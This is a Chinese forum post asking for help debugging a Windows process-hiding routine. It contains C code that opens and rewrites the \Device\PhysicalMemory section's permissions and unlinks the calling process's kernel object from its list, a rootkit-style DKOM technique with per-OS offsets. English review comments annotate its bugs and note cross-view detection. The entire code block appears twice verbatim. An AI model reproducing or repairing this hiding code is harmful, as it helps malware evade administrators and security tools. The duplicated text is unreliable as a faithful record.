请大家分析一下,看问题出在哪里,下面是调用隐藏的方法:
// Splices the calling process's kernel process object out of a doubly linked
// list by writing directly into physical memory (the "hide" routine the
// poster is asking about). Flow: InitNTDLL() -> OpenPhysicalMemory() ->
// choose two per-OS-version offsets f and b into the object returned by
// GetEprocessFromPid() -> read the two neighbour pointers at process+f and
// process+b with GetData() -> SetData() them to point at each other.
// In every offset pair below b == f + 4, i.e. f is the list entry's Flink
// and b its Blink (32-bit pointers: kernel addresses travel in ULONG and the
// "+4" at the end is one pointer width). Which list this is, is not named
// on this page.
// Returns FALSE only when OpenPhysicalMemory() fails or the OS version is not
// in the table. NOTE(review): when InitNTDLL() fails the whole body is
// skipped and the function still returns TRUE, reporting success for
// something it never attempted.
// From a defensive standpoint this is a DKOM-style list unlink; it is found
// by cross-view enumeration (comparing several independent kernel views of
// the process set), not by trusting any single list.
BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) // Poster reports this always returns 0 (NULL), so execution stops here.
{
return FALSE;
}
int f,b; // f = Flink offset, b = Blink offset inside the process object, chosen by OS version below
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi); // NOTE(review): return value unchecked and osvi is otherwise uninitialised; on failure the version fields are garbage
// f=0x88;b=0x8c;  (old hard-coded values; identical to the Windows XP row below)
if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)// Windows 2000
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)// Windows XP
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)// Windows Server 2003
{
f=0x8a;b=0x8e;
}
else return FALSE; // NOTE(review): g_pMapPhysicalMemory / g_hMPM from OpenPhysicalMemory() are left mapped and open on this path
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)// Windows NT 4.0 (dwPlatformId 2 == VER_PLATFORM_WIN32_NT)
{
f=0x98;b=0x9c;
}
else return FALSE; // NOTE(review): same mapping/handle leak as above
// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c)); LocateNtdllEntry( );
// Open a handle to ourselves so the process also appears in the handle list;
// the original author notes that PROCESS objects have ObjectTypeNum 5.
// NOTE(review): the returned handle is discarded and never closed.
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() ); // kernel address of our process object (helper defined elsewhere; result not validated)
ULONG fw=GetData(PVOID(process+f)); // our Flink: address of the next entry
ULONG bw=GetData(PVOID(process+b)); // our Blink: address of the previous entry
SetData(PVOID(fw+4),bw); // next->Blink = our Blink
SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory); // prev->Flink = our Flink; then drop the physical-memory view (no error checks on any of these)
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
} // OpenPhysicalMemory() follows
// Opens the \Device\PhysicalMemory section and maps one page (0x1000 bytes
// at physical offset 0x30000) into the global g_pMapPhysicalMemory; the
// section handle is stored in the global g_hMPM and also returned.
// Returns NULL when the section cannot be opened or mapped.
// Ownership: the caller is expected to UnmapViewOfFile(g_pMapPhysicalMemory)
// and CloseHandle(g_hMPM).
// NOTE(review): later Windows releases refuse user-mode opens of this
// section by design; if that is the environment in use, the persistent NULL
// the poster sees is the platform's mitigation working as intended rather
// than a defect in this function.
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
// Filled field by field; roughly what InitializeObjectAttributes() does with no flags.
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
// Fallback: reopen with only the rights needed to change the section's DACL,
// let SetPhyscialMemorySectionCanBeWrited() (defined elsewhere) widen it,
// then retry the read/write open.
// NOTE(review): the status of this second open is never checked, so a failed
// open passes an invalid g_hMPM to the helper and to CloseHandle().
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
} if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4, // NOTE(review): magic number; 4 is the value of FILE_MAP_READ -- a named constant would make the intended access obvious
0, // high 32 bits of the offset
0x30000, // low 32 bits of the physical offset to map; why this page is chosen is not shown here
0x1000); // map exactly one page
if( g_pMapPhysicalMemory == NULL )
{
// NOTE(review): g_hMPM is still open on this path and the caller treats NULL
// as failure without closing it, so the section handle leaks.
return NULL;
}
return g_hMPM;
}
// Splices the calling process's kernel process object out of a doubly linked
// list by writing directly into physical memory (the "hide" routine the
// poster is asking about). Flow: InitNTDLL() -> OpenPhysicalMemory() ->
// choose two per-OS-version offsets f and b into the object returned by
// GetEprocessFromPid() -> read the two neighbour pointers at process+f and
// process+b with GetData() -> SetData() them to point at each other.
// In every offset pair below b == f + 4, i.e. f is the list entry's Flink
// and b its Blink (32-bit pointers: kernel addresses travel in ULONG and the
// "+4" at the end is one pointer width). Which list this is, is not named
// on this page.
// Returns FALSE only when OpenPhysicalMemory() fails or the OS version is not
// in the table. NOTE(review): when InitNTDLL() fails the whole body is
// skipped and the function still returns TRUE, reporting success for
// something it never attempted.
// From a defensive standpoint this is a DKOM-style list unlink; it is found
// by cross-view enumeration (comparing several independent kernel views of
// the process set), not by trusting any single list.
BOOL HideProcessAtAll()
{
if (InitNTDLL())
{
if (OpenPhysicalMemory()==0) // Poster reports this always returns 0 (NULL), so execution stops here.
{
return FALSE;
}
int f,b; // f = Flink offset, b = Blink offset inside the process object, chosen by OS version below
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize=sizeof(osvi);
GetVersionEx(&osvi); // NOTE(review): return value unchecked and osvi is otherwise uninitialised; on failure the version fields are garbage
// f=0x88;b=0x8c;  (old hard-coded values; identical to the Windows XP row below)
if(osvi.dwMajorVersion==5)
{
if(osvi.dwMinorVersion==0)// Windows 2000
{
f=0xa0;b=0xa4;
}
else if(osvi.dwMinorVersion==1)// Windows XP
{
f=0x88;b=0x8c;
}
else if(osvi.dwMinorVersion==2)// Windows Server 2003
{
f=0x8a;b=0x8e;
}
else return FALSE; // NOTE(review): g_pMapPhysicalMemory / g_hMPM from OpenPhysicalMemory() are left mapped and open on this path
}
else if(osvi.dwMajorVersion==4 && osvi.dwMinorVersion==0 &&osvi.dwPlatformId==2)// Windows NT 4.0 (dwPlatformId 2 == VER_PLATFORM_WIN32_NT)
{
f=0x98;b=0x9c;
}
else return FALSE; // NOTE(review): same mapping/handle leak as above
// ULONG thread=GetData((PVOID)0xFFDFF124);
// ULONG process=GetData((PVOID)(thread+0x22c)); LocateNtdllEntry( );
// Open a handle to ourselves so the process also appears in the handle list;
// the original author notes that PROCESS objects have ObjectTypeNum 5.
// NOTE(review): the returned handle is discarded and never closed.
OpenProcess( PROCESS_ALL_ACCESS,FALSE,GetCurrentProcessId() );
ULONG process=(ULONG)GetEprocessFromPid( (DWORD)GetCurrentProcessId() ); // kernel address of our process object (helper defined elsewhere; result not validated)
ULONG fw=GetData(PVOID(process+f)); // our Flink: address of the next entry
ULONG bw=GetData(PVOID(process+b)); // our Blink: address of the previous entry
SetData(PVOID(fw+4),bw); // next->Blink = our Blink
SetData(PVOID(bw),fw); UnmapViewOfFile(g_pMapPhysicalMemory); // prev->Flink = our Flink; then drop the physical-memory view (no error checks on any of these)
CloseHandle(g_hMPM);
CloseNTDLL();
}
return TRUE;
} // OpenPhysicalMemory() follows
// Opens the \Device\PhysicalMemory section and maps one page (0x1000 bytes
// at physical offset 0x30000) into the global g_pMapPhysicalMemory; the
// section handle is stored in the global g_hMPM and also returned.
// Returns NULL when the section cannot be opened or mapped.
// Ownership: the caller is expected to UnmapViewOfFile(g_pMapPhysicalMemory)
// and CloseHandle(g_hMPM).
// NOTE(review): later Windows releases refuse user-mode opens of this
// section by design; if that is the environment in use, the persistent NULL
// the poster sees is the platform's mitigation working as intended rather
// than a defect in this function.
HANDLE OpenPhysicalMemory()
{
NTSTATUS status;
UNICODE_STRING physmemString;
OBJECT_ATTRIBUTES attributes;
RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" );
// Filled field by field; roughly what InitializeObjectAttributes() does with no flags.
attributes.Length = sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory = NULL;
attributes.ObjectName = &physmemString;
attributes.Attributes = 0;
attributes.SecurityDescriptor = NULL;
attributes.SecurityQualityOfService = NULL;
status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
if(status == STATUS_ACCESS_DENIED){
// Fallback: reopen with only the rights needed to change the section's DACL,
// let SetPhyscialMemorySectionCanBeWrited() (defined elsewhere) widen it,
// then retry the read/write open.
// NOTE(review): the status of this second open is never checked, so a failed
// open passes an invalid g_hMPM to the helper and to CloseHandle().
status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes);
} if( !NT_SUCCESS( status ))
{
return NULL;
}
g_pMapPhysicalMemory = MapViewOfFile(
g_hMPM,
4, // NOTE(review): magic number; 4 is the value of FILE_MAP_READ -- a named constant would make the intended access obvious
0, // high 32 bits of the offset
0x30000, // low 32 bits of the physical offset to map; why this page is chosen is not shown here
0x1000); // map exactly one page
if( g_pMapPhysicalMemory == NULL )
{
// NOTE(review): g_hMPM is still open on this path and the caller treats NULL
// as failure without closing it, so the section handle leaks.
return NULL;
}
return g_hMPM;
}